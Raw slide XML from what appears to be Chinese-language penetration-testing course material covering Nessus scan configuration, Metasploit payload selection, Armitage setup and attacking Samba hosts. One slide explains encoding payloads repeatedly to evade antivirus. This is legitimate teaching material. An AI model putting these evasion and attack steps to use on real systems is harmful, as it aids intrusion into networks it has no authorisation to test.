                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>应用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>如果是移动应用那么就选择移动应用扫描。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Basic network Scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>主要针对网络上的设备进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FC5531"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>端口扫描</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>，适用于任何网络主机。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Host Discover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>主机发现，主要用来探测上网络存活的主机及开放的端口，操作系统信息等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>最上面的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>host discovery </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>为发现主机，也就是一般用来测试目标和我们的扫描器是否可以连通和一些基本的端口等。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="121212"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="-apple-system"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="121212"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="-apple-system"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Mgmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>里面把会话超时时间改一下，默认为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>30</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>分钟不操作会自动注销，免得经常登录</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="121212"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="-apple-system"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="121212"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="-apple-system"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>https://zhuanlan.zhihu.com/p/625304158?utm_id=0</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13419541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0E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27231383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u="none" strike="noStrike" baseline="0" dirty="0">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39457757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0E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>52</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12081261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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-b </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>排除</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F73131"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>\x00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>这个坏字符串</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>,16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>进制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>NULL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>空字符，代码中没用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 指定编码加密次数，为了让杀毒软件，更难查出源</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代码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>53</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25403792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0E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>54</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36496227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https://zhuanlan.zhihu.com/p/388725815 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安装使用教程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>56</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8032022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2800" b="0" i="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>扫描</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>到开启</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Samba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>服务器的主机后，就可以进行渗透攻击了</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="18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80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41395067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参考网址：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>https://www.cnblogs.com/hhhhhxian/p/16071451.html </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Show payloads </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Set payload</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>58</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13611792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0E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27529088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https://www.cnblogs.com/hack747/p/16533329.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>该界面提示是否要启动 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>RPC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>服务。单击“是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>(Y)”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>按钮。</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80E9C3F2-20D7-4333-93B0-0875AF8439D3}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>61</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1190368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b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Plugin Rules</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>是插件规则。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>如果有特定的目标系统，可以针对性地选择启用对应的漏洞插件，这样可以节约扫描时间及网络资源。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="333333"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="-apple-system"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>My Scans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>就是当前账户的任务扫描</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>All Scans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>就是所有账户的任务扫描。包括被删除进垃圾桶的任务。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="121212"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="-apple-system"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>import</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>可以批量导入要扫描的目标等。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>New Folder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>是新建文件夹，后面新建的任务都在这里面便于区分，</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>就是我们扫描的任务名称，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>description </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>就是任务的描述，等于是备注。</a:t>
            </a:r>
